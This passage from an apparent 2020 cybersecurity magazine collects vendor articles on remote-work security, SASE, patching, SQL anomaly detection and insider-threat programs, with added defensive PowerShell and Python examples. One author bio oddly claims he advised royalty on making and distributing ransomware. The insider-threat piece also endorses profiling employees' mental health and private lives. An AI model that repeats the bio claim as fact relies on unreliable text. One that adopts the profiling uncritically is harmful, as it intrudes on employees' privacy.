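        [int]$MaxLockoutThreshold = 10, # assumed
        [int]$MinHistory = 12           # assumed
    )
    $findings = New-Object System.Collections.Generic.List[string]

    if (-not $Policy.ComplexityEnabled) { $findings.Add('Complexity requirements are disabled') }
    if ($Policy.MinPasswordLength -lt $MinLength) {
        $findings.Add("Minimum length is $($Policy.MinPasswordLength), expected at least $MinLength")
    }
    # MaxPasswordAge is a TimeSpan; a zero TimeSpan means expiry is disabled
    $ageDays = $Policy.MaxPasswordAge.TotalDays
    if ($ageDays -eq 0 -or $ageDays -gt $MaxAgeDays) {
        $findings.Add("Maximum age is $ageDays days, expected 1..$MaxAgeDays")
    }
    # LockoutThreshold of 0 means accounts never lock out, leaving remote logons open to guessing
    if ($Policy.LockoutThreshold -eq 0 -or $Policy.LockoutThreshold -gt $MaxLockoutThreshold) {
        $findings.Add("Lockout threshold is $($Policy.LockoutThreshold), expected 1..$MaxLockoutThreshold")
    }
    if ($Policy.PasswordHistoryCount -lt $MinHistory) {
        $findings.Add("Password history is $($Policy.PasswordHistoryCount), expected $MinHistory or more")
    }
    if ($Policy.ReversibleEncryptionEnabled) { $findings.Add('Reversible encryption is enabled') }

    [pscustomobject]@{
        Compliant = ($findings.Count -eq 0)
        Findings  = $findings.ToArray()
    }
}

# Constructed sample policy (not real domain data), shaped like the cmdlet output:
# complexity on, but short passwords, no expiry and no lockout
$sample = [pscustomobject]@{
    ComplexityEnabled           = $true
    MinPasswordLength           = 8
    MaxPasswordAge              = [TimeSpan]::FromDays(0)
    LockoutThreshold            = 0
    PasswordHistoryCount        = 24
    ReversibleEncryptionEnabled = $false
}
Test-PasswordPolicy -Policy $sample | Format-List

# Against a live domain (requires the RSAT ActiveDirectory module):
# Test-PasswordPolicy -Policy (Get-ADDefaultDomainPasswordPolicy)
```

The sample deliberately fails three of the checks (length, expiry, lockout) so the output shows what a finding looks like; fine-grained password policies applied to specific groups are returned by Get-ADFineGrainedPasswordPolicy and can be fed to the same function.<br />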
Communication and the Training of Homeworkers<br />
Lots of people have worked from home in the past, but for many, COVID-19 has forced employees to<br />
use technology and work from home for the first time. For many, this change is extremely difficult to adapt<br />
to, not only at a technical level but also in adapting to online meetings and working on your own.<br />
This introduces many security risks. Employees may not remember all the rules of home working. They<br />
may use their own devices, or they may unintentionally share confidential information on social media.<br />
Clear and concise communication channels from senior management or HR should communicate a<br />
consistent message defining what the expectations of the employee are. The messaging should describe<br />
how the business intends to function during a lockdown and what the company priorities are.<br />
Combine that with training sessions, online classes, or one-on-one training about how to use<br />
collaboration tools, cloud productivity tools, and how working from home affects access to everyday user<br />
applications.<br />
Engaging with employees regularly is a great way to promote wellbeing at work, and keep productivity<br />
and engagement throughout the business. This benefits morale, and importantly creates a greater<br />
understanding of how to use computer systems securely.<br />
System Updates / Antivirus<br />
Security updates to operating systems and applications have never been more important than during the<br />
COVID-19 crisis. System administrators have the responsibility of ensuring that the mobile workforce<br />
information technology is up to date and has the latest security updates.<br />
When an employee's laptop connects to a corporate network, it will typically check in with a centralized<br />
administration portal, such as Microsoft System Center Configuration Manager (SCCM). Toolsets like this manage the update<br />
schedule of thousands of laptops, computers, and mobile devices over a VPN or standard Internet<br />
connection.<br />
Administrators can force updates out on demand to keep antivirus, antimalware, and system updates at<br />
the latest level. This creates the best line of defense against malware and ransomware attacks.<br />
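As an added example (not from the article), this PowerShell script gives an administrator the per-device view that the section describes: how long ago the last security update was installed and whether the antivirus signatures are current. It uses the built-in Get-HotFix cmdlet and, for Microsoft Defender, Get-MpComputerStatus; the 45-day and 3-day thresholds are assumed values, and a device running a third-party antivirus will need that vendor's equivalent query.<br />

```powershell
# Added example (not from the article): report whether a Windows endpoint has
# received an update recently and whether its Microsoft Defender signatures
# and scans are current. Thresholds are assumed values.

function Get-UpdateCurrencyReport {
    param(
        [int]$MaxDaysSinceHotfix = 45,  # assumed: one monthly patch cycle plus slack
        [int]$MaxSignatureAgeDays = 3,  # assumed: Defender normally updates several times a day
        [int]$MaxQuickScanAgeDays = 7   # assumed
    )
    $findings = New-Object System.Collections.Generic.List[string]
    $now = Get-Date

    # Latest installed hotfix; InstalledOn is empty for some entries, so drop those first
    $latest = Get-HotFix | Where-Object { $_.InstalledOn } |
              Sort-Object InstalledOn -Descending | Select-Object -First 1
    $latestKb = $null
    if ($null -eq $latest) {
        $findings.Add('Updates: no dated hotfix entries found')
    }
    else {
        $latestKb = $latest.HotFixID
        $age = ($now - $latest.InstalledOn).Days
        if ($age -gt $MaxDaysSinceHotfix) {
            $findings.Add("Updates: last hotfix $latestKb installed $age days ago")
        }
    }

    # Defender status: real-time protection, signature age, last quick scan
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($null -eq $mp) {
        $findings.Add('Antivirus: Defender status unavailable (third-party AV in use or service stopped)')
    }
    else {
        if (-not $mp.RealTimeProtectionEnabled) {
            $findings.Add('Antivirus: real-time protection is disabled')
        }
        if ($mp.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
            $findings.Add("Antivirus: signatures are $($mp.AntivirusSignatureAge) days old")
        }
        if ($mp.QuickScanAge -gt $MaxQuickScanAgeDays) {
            $findings.Add("Antivirus: last quick scan was $($mp.QuickScanAge) days ago")
        }
    }

    [pscustomobject]@{
        Computer  = $env:COMPUTERNAME
        LatestKB  = $latestKb
        Compliant = ($findings.Count -eq 0)
        Findings  = $findings.ToArray()
    }
}

Get-UpdateCurrencyReport | Format-List
```

Get-HotFix only lists updates installed through Windows Update or as .msu packages, so for a fleet view the SCCM or Windows Update for Business compliance reports remain the source of truth; this script is the quick check an administrator runs on a single laptop that has just reconnected over the VPN.<br />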
Software Protections<br />
The software on the portable equipment must comply with the organizational standards to ensure it is<br />
supportable. As mentioned earlier, up-to-date antivirus detection software should be installed to protect local<br />
systems. No unauthorized software should be loaded onto company assets, no matter how trivial.<br />
Software should not be tampered with to circumvent security measures put in place, such as disabling<br />
antivirus system scans.<br />
Any tampering with the software should be considered a disciplinary offense, and the antivirus suite should<br />
be configured to audit user behavior. When used to access the Internet, the user’s device should utilize<br />
a proxy server where the activity is logged and monitored.<br />
About the Author<br />
Marty Puranik co-founded Atlantic.Net from his dorm room at the<br />
University of Florida in 1994. As CEO and President of Atlantic.Net,<br />
one of the first Internet Service Providers in America, Marty grew the<br />
company from a small ISP to a large regional player, while<br />
observing America's regulatory environment limit competition and<br />
increase prices on consumers. To keep pace with a changing industry, over the years he has led<br />
Atlantic.Net through the acquisition of 16 Internet companies, tripling the company's revenues and<br />
establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting<br />
before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries.<br />
The Race to Pivot Around Remote Work and The<br />
Emergence Of SASE<br />
By Amit Bareket, CEO and Co-Founder of Perimeter 81<br />
When Kodak completely neglected the rise of digital photography (an idea that Kodak itself invented) and<br />
then continued to willfully drive for a revival of technology destined for the dustbin, it became the<br />
boilerplate example of what can happen when an organization fails to embrace change, and chooses to<br />
fight against the current rather than go with the flow.<br />
Trends and new sources for demand force companies to refresh their business models and pivot around<br />
new concepts, or slowly perish. This is happening now in security, where providers still get away with<br />
offering singular and traditional solutions like firewalls, antivirus software, and VPNs - but not for long.<br />
These products do help to ward off a number of the most common attacks, but converging trends have<br />
whipped up industry waves almost reminiscent of those that once toppled the giant of film.<br />
Crowding the Cloud<br />
The adoption of cloud technology among companies has been full steam ahead for the last decade or<br />
more, and as it becomes our new normal, the security industry must react with new ways to protect data<br />
that’s anywhere and everywhere. For a business, the ascent to the cloud has been deliberately slow, a<br />
department here, a business flow there, so the tide of this sea change has been gradual.<br />
At least, it was until recently. No one wants to harp on the lessons taught by COVID-19, but here we are.<br />
Suddenly, organizations with a desire to exist into the next fiscal year find themselves scrambling to grant<br />
access to remote employees, and this has meant the rapid adoption of cloud technologies and<br />
subsequent creation of a host of new issues that security providers must now respond to.<br />
Overloaded networks on traditional architecture experience high latency, and each new employee<br />
connecting to the resources they need to work slows down the connection speed of his or her peers.<br />
Performance is small potatoes, though. IT teams are more overwhelmed with the number and variety of<br />
different devices and unfamiliar sources of traffic, and security leaders are racing to provide a better<br />
solution than what was available just last year.<br />
IT Still Catching Up Cloud-Wise<br />
Many cloud services tied into local environments and available to many remote workers (often from<br />
personal Wi-Fi connections with dubious security) create gaps where exposure occurs, even due to small<br />
issues such as how they’re configured. A business’s resources may be secure but the wrong box ticked<br />
in the admin panel of a cloud-based service is enough to open cracks that need just a bit of pressure to<br />
widen into a breach.<br />
Sensitive data is also changing hands faster than ever, during a time when hackers are ramping<br />
up their activities to take advantage of the pandemic panic. Under these conditions, orchestrating a stack<br />
of traditional security products isn’t enough, even if they can be deployed in a way that secures the<br />
network on paper. We don’t live on paper. In reality, the tool sprawl approach creates maintenance issues<br />
that the security industry must address alongside classic ideas like threat detection and visibility.<br />
For IT, planning security for in-office infrastructure is simpler, because all employees are always<br />
connecting from the same devices, locations, and IP addresses. Very few security “profiles” need to be<br />
built, so even with an unwieldy and piecemeal stack of different security tools, smart network access<br />
doesn’t need to be scalable. Once network traffic moves from inside the office to outside, however, each<br />
remote worker represents a unique threat.<br />
Remote Work Accelerates the Materialization of SASE<br />
Which providers will be the ones to respond best to the future of remote work - the one where the idea of<br />
remote network access is fast, secure, and scalable? Surely not those who still offer singular firewall<br />
services, or those with a basic VPN solution. None of these solutions alone is enough to defend the<br />
network. Funnily enough, the blueprint for a single security product that might do so was created only<br />
months before the conditions that would necessitate it.<br />
This security ‘blueprint’ is at the heart of a new industry space race. In fact, the idea is so young that it is<br />
prevalent largely among providers rather than the consumers of security, such as in-house IT<br />
professionals. Gartner coined the term SASE, or Secure Access Service Edge, to describe a<br />
unified network security product deployed over the cloud (SaaS), which would change how organizations<br />
consume security and refocus it around users.<br />
Imagined as able to integrate directly with all the resources used by any organization, sans hardware, a<br />
SASE product will make it stunningly simple for the average IT employee to segment the network and<br />
create custom access profiles based on user roles, devices, or locations. At the same time he or she can<br />
enforce the use of advanced security features still sold separately, like IPSec tunneling, 2FA, DNS<br />
filtering, FWaaS, and CASB, and route employee traffic through secured gateways closest to wherever<br />
they choose to work.<br />
The Beacon is Lit<br />
It wasn’t the idea of SASE that fired the starting gun for the security sector’s space race, it was the<br />
rush to support remote workers and the off-hand realization that SASE was a prebuilt solution. The rising<br />
trend of remote work has then also paralleled the prevalence of SASE in the market, and significant<br />
progress has occurred in the space to bring the horizon closer. In the near future, any enterprise-level<br />
company will only need to deploy a single product to secure its local and cloud networks, and the<br />
employees connecting to them from couches and cafes around the world.<br />
Mergers and acquisitions are happening at breakneck speed in the security industry right now, and the<br />
landscape a year from now will be nearly unrecognizable. Reminiscent of how other industries have seen<br />
their products and services consolidated (the evolution of Microsoft’s product suite into Office 365 is a<br />
clear example), security is soon to become a matter of simply pointing and clicking.<br />
About the Author<br />
Amit Bareket is the Co-Founder and CEO of Perimeter 81. Amit is<br />
a cybersecurity expert with extensive experience in system<br />
architecture and software development. He is the author of 8<br />
patents issued by the USPTO for storage, mobile applications and<br />
user interface. Prior to Perimeter 81, Amit worked as a Software<br />
Engineer for major enterprises including IBM XIV Storage and<br />
BigBand Networks. He served in the Israel <strong>Defense</strong> Force’s elite<br />
cyber intelligence unit and graduated Cum Laude with a B.Sc. in<br />
Computer Science and Economics from Tel Aviv University.<br />
Organizations: It’s Time to Rethink How You Protect<br />
Environments from Within<br />
By Richard Melick, senior technical product manager, Automox<br />
Many of us have made the shift to virtual with our work, school and social lives, as we all aim to protect<br />
ourselves and the community during this uncertain time. As such, it’s important to understand that with<br />
new virtual workflows comes an expanded attack surface for hackers to potentially exploit.<br />
In particular, many organizations are struggling with securing and hardening new and existing endpoints<br />
against critical vulnerabilities, an issue that has been exacerbated as remote work policies are enacted.<br />
Automox’s recent <strong>Cyber</strong> Hygiene Index surveyed 560 IT and security professionals and uncovered that<br />
less than 50 percent of organizations can patch vulnerable systems swiftly enough to protect against<br />
critical threats and zero-day attacks.<br />
Endpoint hardening is a critical component of any security strategy, and if not properly managed, can<br />
pose a major threat to an organization's infrastructure. Attackers only need to find one way in to victimize<br />
a system or device – and an endpoint that isn't equipped with the latest patches and security<br />
configurations is likely to be ripe with exploitable vulnerabilities. It is essentially leaving a door unlocked<br />
with a welcome sign out front for attackers.<br />
Is it possible to lessen devastating data breaches within enterprises? Yes, but effective cyber hygiene<br />
measures must be put into place, especially during transitional and uncertain times like today.<br />
The Ongoing Patching and Configuration Crisis<br />
When you couple new potential entry points for hackers to exploit along with the fact that organizations<br />
report taking up to 102 days for patches to be applied and tested, it is apparent that the enterprise attack<br />
surface is growing at an unprecedented rate.<br />
To fully understand the scope of the issue, look no further than three years ago with the WannaCry<br />
ransomware attack. The ransomware was able to spread rapidly by exploiting a known vulnerability that<br />
was left unpatched in a large majority of organizations for months – leading to one of the most notorious<br />
hacking events of our lifetime.<br />
Research for the Automox <strong>Cyber</strong> Hygiene Index also confirmed that four out of five organizations have<br />
suffered at least one data breach in the last two years. When asked about the root causes, respondents<br />
placed phishing attacks (36%) at the top of the list, which is to be expected. Social engineering attacks<br />
continue to be a favorite initial vector that attackers use.<br />
The surprising part of the results is that the majority of breaches could have been prevented with basic<br />
cyber hygiene practices in place. The other top causes were missing operating systems patches (30%),<br />
missing application patches (28%), and operating system misconfigurations (27%) – all of which are<br />
fundamentals of proper endpoint hardening.<br />
The Industry is Failing to Keep Up<br />
Adversaries are weaponizing new critical vulnerabilities within 7 days on average. And zero-day<br />
vulnerabilities are already weaponized at the moment of disclosure, yet companies are known to take<br />
weeks and in some cases months to deploy patches.<br />
For this reason, a 24 / 72 threshold for endpoint hardening is imperative. If organizations can commit to<br />
eliminating zero-day exploits within 24 hours and other critical vulnerabilities within 72 hours, they’ll<br />
prevent weaponization and ultimately better protect their critical assets.<br />
According to the recent survey, the industry is still catching up to meet this ambitious patching standard.<br />
Only 42 percent of companies can patch remote endpoints within three days and 15 percent within one,<br />
highlighting the struggles companies face with patching and hardening endpoints in remote<br />
environments.<br />
Embracing Newer Technologies to Help<br />
One of the more positive outcomes from the research is that companies are increasingly embracing<br />
automation as a potential antidote for the security challenges that they are currently facing.<br />
The findings showed that 96 percent of organizations have deployed some automation for endpoint<br />
patching and hardening, yet only 23 percent are fully automated.<br />
While newer technologies, such as automation, are not a silver bullet, they sure can help ease the efforts<br />
in protecting infrastructure – and executing complex tasks in a timely manner. This effectively eases the<br />
burden on IT and SecOps teams, all while maintaining better security for the organization as a whole, a<br />
true win-win scenario.<br />
The Answer to Better <strong>Cyber</strong> Hygiene?<br />
Good cyber hygiene doesn't have to be complicated. A great place to start to make the transition to a<br />
more modern approach is to audit your organization and take a look at how it leverages its people,<br />
processes and technologies to better secure its endpoints and other assets.<br />
Are our people being put in a position to succeed? What processes could be eliminated or improved?<br />
Are we getting enough out of our technologies to make our security team’s workflow easier?<br />
By answering these important questions and acting on that information, organizations will have a better<br />
understanding of how they can adapt their strategies to address today’s and tomorrow’s challenges.<br />
In times of uncertainty, it’s important that businesses look for long-term fixes, as opposed to putting a<br />
band-aid on issues that are likely to pop up again. The future of work is remote, and it’s critically important<br />
that decision-makers across every industry set their IT and security teams up for future success while<br />
meeting the standards they need to meet today.<br />
About the Author<br />
Richard Melick, senior technical product<br />
manager, Automox. Richard has spent over a<br />
decade advancing through the security industry<br />
with his considerable experience and<br />
considerable focus on the stories surrounding<br />
ransomware, hacking, and cyber attacks. He has<br />
been a security speaker on five continents and<br />
has even advised royalty on how to make and<br />
distribute ransomware.<br />
Richard can be reached online at<br />
(Automox@famapr.com, @AutomoxApp, etc.)<br />
and at our company website<br />
https://www.automox.com/<br />
Don’t Be Breached When Using Commercial Software<br />
Products<br />
By Randy Reiter CEO of Don’t Be Breached<br />
In May, <strong>2020</strong> the software giant SAP made available eighteen security fixes for its Adaptive Server<br />
Enterprise (ASE) database system (formerly Sybase ASE). ASE is used by SAP products and 30,000<br />
organizations worldwide. 90% of the top 50 banks and security firms use ASE.<br />
Four of the eighteen security fixes had a CVSS score of 8 or higher. Common Vulnerability Scoring<br />
System (CVSS ) is a free and open industry standard for assessing the severity of computer system<br />
security vulnerabilities. Vulnerabilities are scored from 0 to 10 with 10 being the most severe.<br />
One of the security fixes was for SQL Injection Attacks. This vulnerability allowed any user of a database<br />
regardless of their permission level to gain Administrator access to the entire database. Wow.<br />
SAP software products are comprehensive and complex. SAP customers have added on average up to<br />
2 million lines of custom code to their deployment. This makes applying security patches a lengthy<br />
process due to comprehensive application testing requirements prior to deployment of the security fixes.<br />
Other <strong>2020</strong> Database Security Vulnerabilities:<br />
• June, <strong>2020</strong>. KingMiner botnet operation targets SQL Server databases with brute force attacks.<br />
The KingMiner botnet has been active since 2018. Once KingMiner gains access to SQL Server<br />
it is capable of gaining root access to the Windows server.<br />
• May, <strong>2020</strong>. Hacker leaked online the database for 7,600 websites serviced by Daniel’s Hosting.<br />
Daniel’s Hosting is the largest free web hosting provider for Dark Web services. The leaked<br />
database included 3,000+ email addresses, 7,000+ account passwords and 8,000+ private keys<br />
for .onion (dark web) domains.<br />
How to Protect Confidential Database Data from Insider Threats and Hackers?<br />
Confidential database data includes: credit card, tax ID, medical, social media, corporate, manufacturing,<br />
law enforcement, defense, homeland security and public utility data. This data is almost always stored in<br />
Cassandra, DB2, Informix, MongoDB, MariaDB, MySQL, Oracle, PostgreSQL, SAP Hana, SQL Server<br />
and Sybase databases. Once inside the security perimeter a Hacker or Rogue Insider can use commonly<br />
installed database utilities to steal confidential database data.<br />
Non-intrusive network sniffing can capture and analyze the normal database query and SQL activity from<br />
a network tap or proxy server with no impact on the database server. This SQL activity is very predictable.<br />
Database servers servicing 10,000 end-users typically process daily 2,000 to 10,000 unique query or<br />
SQL commands that run millions of times a day.<br />
Advanced SQL Behavioral Analysis of Database Query and SQL Activity<br />
Advanced SQL Behavioral Analysis of the database SQL activity can learn what the normal database<br />
activity is. Then from a network tap or proxy server the database query and SQL activity can be non-intrusively<br />
monitored in real-time and non-normal SQL activity immediately identified. Non-normal SQL<br />
activity from Hackers or Rogue Insiders can be detected in a few milliseconds. The Hacker or Rogue<br />
Insider database session can be immediately terminated and the Security Team notified so that<br />
confidential database data is not stolen.<br />
Advanced SQL Behavioral Analysis of the query activity can go even further and learn the maximum<br />
amount of data queried plus the IP addresses all queries were submitted from for each of the 2,000 to<br />
10,000 unique SQL queries sent to a database. This type of data protection can detect never before<br />
observed query activity, queries sent from a never observed IP address and queries sending more data<br />
to an IP address than the query has ever sent before. This allows real-time detection of Hackers and<br />
Rogue Insiders attempting to steal confidential web site database data. Once detected the security team<br />
can be notified within a few milliseconds so that a data breach is prevented.<br />
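As an added example (not code from the article or from Sql Power Tools), the per-query baseline described above in a minimal form: each SQL statement is reduced to a template, the template's known source IPs and largest observed result set are learned from normal traffic, and later activity is flagged when the template, the source IP or the row count has never been seen before. All traffic below is constructed sample data; the 10.0.x.x addresses are hypothetical.<br />

```python
"""
Added example: a minimal per-query behavioural baseline for database SQL
traffic captured from a network tap. Not the article's or Sql Power Tools'
code; all sample sessions are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Literal values are replaced by "?" so that statements differing only in
# their parameters collapse into one template (the "unique query" the text
# counts, of which a busy server sees a few thousand a day).
_STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")
_NUMBER_LITERAL = re.compile(r"\b\d+(?:\.\d+)?\b")
_WHITESPACE = re.compile(r"\s+")


def fingerprint(sql: str) -> str:
    """Normalise a SQL statement into a template key."""
    sql = _STRING_LITERAL.sub("?", sql)
    sql = _NUMBER_LITERAL.sub("?", sql)
    return _WHITESPACE.sub(" ", sql).strip().lower()


@dataclass
class QueryProfile:
    """What has been observed as normal for one query template."""
    max_rows: int = 0
    source_ips: set = field(default_factory=set)


class SqlBehaviourBaseline:
    def __init__(self) -> None:
        self.profiles: dict = defaultdict(QueryProfile)

    def learn(self, sql: str, src_ip: str, rows_returned: int) -> None:
        """Learning phase: record the template's source IPs and largest result."""
        profile = self.profiles[fingerprint(sql)]
        profile.max_rows = max(profile.max_rows, rows_returned)
        profile.source_ips.add(src_ip)

    def check(self, sql: str, src_ip: str, rows_returned: int) -> list:
        """Monitoring phase: reasons this observation is non-normal ([] if normal)."""
        profile = self.profiles.get(fingerprint(sql))  # .get() does not create
        if profile is None:
            return ["never-observed query"]
        reasons = []
        if src_ip not in profile.source_ips:
            reasons.append("never-observed source IP for this query")
        if rows_returned > profile.max_rows:
            reasons.append(f"returned {rows_returned} rows, above the observed "
                           f"maximum of {profile.max_rows}")
        return reasons


# Constructed "normal" traffic: two application servers run the same two
# templates all day and fetch small result sets.
NORMAL_TRAFFIC = [
    ("SELECT name, email FROM customers WHERE id = 42", "10.0.1.10", 1),
    ("SELECT name, email FROM customers WHERE id = 1077", "10.0.1.11", 1),
    ("SELECT id, total FROM orders WHERE customer_id = 42 AND status = 'open'", "10.0.1.10", 12),
    ("SELECT id, total FROM orders WHERE customer_id = 9 AND status = 'open'", "10.0.1.11", 37),
]

# Constructed later activity to be checked against the baseline.
SUSPECT_TRAFFIC = [
    # Known template, known server, usual size: nothing to report.
    ("SELECT name, email FROM customers WHERE id = 8", "10.0.1.10", 1),
    # A bulk pull with a database utility from a host never seen before.
    ("SELECT name, email FROM customers WHERE id > 0", "10.0.9.77", 250000),
    # Known template, but from that new host and returning the whole table.
    ("SELECT id, total FROM orders WHERE customer_id = 1 AND status = 'open'", "10.0.9.77", 40000),
]


def build_baseline(traffic=NORMAL_TRAFFIC) -> SqlBehaviourBaseline:
    baseline = SqlBehaviourBaseline()
    for sql, src_ip, rows in traffic:
        baseline.learn(sql, src_ip, rows)
    return baseline


def monitor(baseline: SqlBehaviourBaseline, traffic=SUSPECT_TRAFFIC) -> list:
    """Return (sql, src_ip, reasons) for every non-normal observation. The
    article's next steps, ending the session and notifying the security team,
    would hang off this list."""
    alerts = []
    for sql, src_ip, rows in traffic:
        reasons = baseline.check(sql, src_ip, rows)
        if reasons:
            alerts.append((sql, src_ip, reasons))
    return alerts


if __name__ == "__main__":
    for sql, src_ip, reasons in monitor(build_baseline()):
        print(f"{src_ip}: {sql}\n    -> {'; '.join(reasons)}")
```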
About the Author<br />
Randy Reiter is the CEO of Don’t Be Breached a Sql Power Tools company. He<br />
is the architect of the Database <strong>Cyber</strong> Security Guard product, a database data<br />
breach prevention product for Informix, MariaDB, Microsoft SQL Server, MySQL,<br />
Oracle and Sybase databases. He has a Master’s Degree in Computer Science<br />
and has worked extensively over the past 25 years with real-time network sniffing<br />
and database security. Randy can be reached online at<br />
rreiter@DontBeBreached.com, www.DontBeBreached.com and<br />
www.SqlPower.com/<strong>Cyber</strong>-Attacks.<br />
Is Proactive Insider Risk Mitigation Possible?<br />
Why Companies Need More Than Technical Indicators to Identify Their Biggest Threats Before They<br />
Do Harm<br />
By David A. Sanders, Director of Insider Threat Operations, Haystax<br />
Most corporate insider threat programs are structured and equipped to mitigate adverse events<br />
perpetrated by trusted insiders only after they have occurred. But proactive insider risk management is<br />
possible – and it starts with a robust approach to detection.<br />
Consider this scenario, based on a real-life case, in which a concerning insider threat event turns out to<br />
be more complicated than expected:<br />
John commented to other employees that it would be easy to take down the new cloud services<br />
his company recently migrated to from their on-premises systems. The employees reported the<br />
comment to their manager, who reported it to human resources and ultimately the company’s<br />
insider threat program. An investigation revealed that John was angry because his role had<br />
changed with the new architecture. In addition, he was clinically depressed, off medication and<br />
had suicidal thoughts. The investigative results prompted a coordinated response among the<br />
insider threat program, security, legal and human resources. The threat was mitigated, with the<br />
final step of referring John to the employee assistance program.<br />
Because the insider threat team was notified about one behavioral indicator of a high-impact event,<br />
additional indicators were gathered and assessed to determine that John was a potential threat to the<br />
company and to himself. In doing so, the company was able to intervene and proactively mitigate an<br />
insider threat event before it occurred. The resulting cost and impact were minimal. By contrast, the<br />
projected cost and impact of the cloud services being taken off-line for one day were very high.<br />
It is impossible to know whether John would have committed an act of sabotage or self-harm, but the<br />
mitigation efforts nevertheless reduced the chances and allowed John to remain employed and<br />
productive.<br />
Without a proactive response, the alternative is to detect and respond to an event after it occurs, incurring<br />
the cost of the impact then attempting to minimize the effect.<br />
The Path to Proactive Risk Mitigation<br />
Eric Shaw and Laura Sellers created the ‘Critical Path to Insider Risk’ in 2015, after studying insider threat<br />
cases in the U.S. intelligence community and at the Department of <strong>Defense</strong>. They concluded that<br />
perpetrators exhibit observable indicators prior to their acts. This concept is represented in the graphic<br />
below.<br />
Source: Eric Shaw and Laura Sellers (2015) "Application of the Critical-Path Method to Evaluate Insider<br />
Risks," Studies in Intelligence, Volume 59, Number 2, June, pages 41-48. The Central Intelligence<br />
Agency, Washington, DC.<br />
The practical application of these findings is that knowledge of ‘personal predispositions’ and behavioral<br />
indicators can inform the judgment of experts to determine whether an insider is on the path to becoming<br />
a risk.<br />
Based on that judgment, a measured and effective response can be planned to assess the risk through<br />
preliminary assessments – and perhaps a complete investigation, if warranted. The goal is to mitigate or<br />
prevent the insider risk event by engaging with the potential threat early. This is precisely what occurred<br />
in John’s case. The company responded effectively to ‘turn John around’ and prevent potentially hostile<br />
and harmful acts from occurring.<br />
Technical and Non-Technical Risk Indicators<br />
The <strong>Defense</strong> Counterintelligence and Security Agency (DCSA) Center for Development of Security<br />
Excellence published a list of potential risk indicators, which are categorized below into ‘Technical<br />
Indicators’ and ‘Non-Technical Indicators.’ Technical indicators can be detected by monitoring and<br />
analyzing computer and network activities. Non-technical indicators typically occur off the computer and<br />
network and therefore cannot be detected on those systems.<br />
Insider threat potential risk indicators categorized by whether or not they can be commonly detected by<br />
monitoring computer and network activity.<br />
While the average enterprise insider threat program might not share the same objectives as DCSA, the<br />
agency’s human-centric view of the challenge is instructive to companies because the cause of insider<br />
threat problems is, by definition, known individuals associated with and managed by the organization.<br />
Effort and resources allocated to gathering, integrating and analyzing non-technical indicators to better<br />
know those individuals can improve the effectiveness of programs that mostly rely on technical indicators<br />
to prioritize higher-risk employees. In this regard, non-technical indicators help programs to get ahead of<br />
insider threat problems, rather than simply react to them.<br />
Using Non-Technical Risk Indicators<br />
Non-technical indicators are available within most company systems. For example, human resource<br />
information systems will contain data about promotions, demotions, suspensions, performance ratings,<br />
training records and previous employers. Security information systems may have records of violations,<br />
anomalous attempts to gain access to unauthorized areas and, in the case of the defense and aerospace<br />
industry, security-clearance denials.<br />
Facilitating the identification and reporting of additional kinds of non-technical behaviors can be more<br />
challenging. For example, ‘See Something, Say Something’ programs have limited utility for multiple<br />
reasons. First, co-workers often do not consciously recognize the indicators until they are significant or<br />
until something bad happens. Second, if they do recognize a concern, they rarely report it because they<br />
do not see it as significant, or they do not want to get someone they like in trouble.<br />
To overcome these challenges, insider threat programs need to repeatedly communicate that the goal of<br />
the program is to mitigate risks in a proactive and positive manner, helping employees while protecting<br />
company assets. As this goal is accomplished, stakeholders, supervisors and employees will take notice,<br />
which will increase compliance and participation in the reporting program.<br />
Next, insider threat programs need to facilitate the reporting of anomalous activity by supervisors. This<br />
can be accomplished via direct conversations, indirectly through human resources or by using surveys.<br />
The results of this reporting should then inform the insider threat program threat detection capability.<br />
Temporal Analysis<br />
The importance of integrating and analyzing indicators over time cannot be overstated. Let’s consider a<br />
fictitious scenario where there are non-technical behavioral indicators that increase the threat level of an<br />
employee:<br />
Jolene has been with her company for three years. Initially she was a good performer but that has<br />
changed over the past two years. She has grown increasingly unhappy with her job as a database<br />
administrator and her personal life is in shambles. She finds her role trivial and she feels the<br />
company is not treating her fairly compared to others, which she has expressed to human<br />
resources. She applied for a position in another department but was not selected, which made<br />
her even more angry and frustrated. She has access to mission-critical systems with authorization<br />
to create and destroy databases, tables and records. Her supervisor works from another office<br />
location, and does not meet with her more than once every two weeks. Outside of work, Jolene<br />
barely has enough money to pay rent for a two-bedroom apartment since her boyfriend left town.<br />
Moreover, she recently wrecked her truck and her cat is sick again. She is not sleeping well and<br />
has turned to drugs and alcohol.<br />
Jolene has moved far along the critical path to insider risk. She has multiple stressors, exhibits concerning<br />
behaviors and has experienced problematic organizational responses. And she has access to critical<br />
company systems.<br />
It would be wise to fully evaluate then mitigate any risk that Jolene presents, with the goal of protecting<br />
company assets and assisting a struggling employee. Yet very few companies have the capability to<br />
assemble and analyze this non-technical information to effectively identify when an insider like Jolene is<br />
on the path to insider risk. Assessing employees’ private lives through background or credit checks or<br />
other measures is not even necessary in most cases; many other indicators are already collected by the<br />
organization and readily available.<br />
The inadequate use of non-technical indicators might be due to the fact that many insider threat programs<br />
grow out of existing cyber security programs using management tools such as UEBA and SIEM, which<br />
were developed to evaluate large volumes of technical data using rules and machine learning to identify<br />
technical behavioral anomalies.<br />
As discussed above, when looking at insider threats as caused by known humans, these technical<br />
indicators are perhaps one-third of the picture. Risk-scoring models built solely around technical<br />
indicators are not designed to put the anomalies that they detect into the broader context of the critical<br />
path to insider risk. These models can only be effective if they add non-technical behavioral indicators to<br />
the analytical mix.<br />
Multi-Disciplinary Technology Platforms for Evaluating Insider Threats<br />
Insider threat programs should consist of diverse experts representing human resources, legal,<br />
information security, cybersecurity, information technology, physical security, behavioral science and<br />
counterintelligence. These disciplines bring data and perspective when evaluating insider threats. They<br />
weigh evidence and give opinions on whether the behavior is indicative of a threat.<br />
The problem is that this approach does not scale well in organizations with large numbers of employees,<br />
since no team of experts could keep up.<br />
But the experts can share their judgments and wisdom in analytic tools that apply complex reasoning that<br />
goes into contextualized analysis of insider threats. For this approach, Bayesian inference networks are<br />
an ideal solution.<br />
Bayesian networks can be built to probabilistically model expert reasoning across multiple domains using<br />
the full range of technical and non-technical behavioral indicators of insider risk. The result is a vastly<br />
improved capability to identify high-risk insiders that have committed threat activities, as well as those<br />
who are on the Critical Path to potentially commit them in the future. The probabilistic model enables the<br />
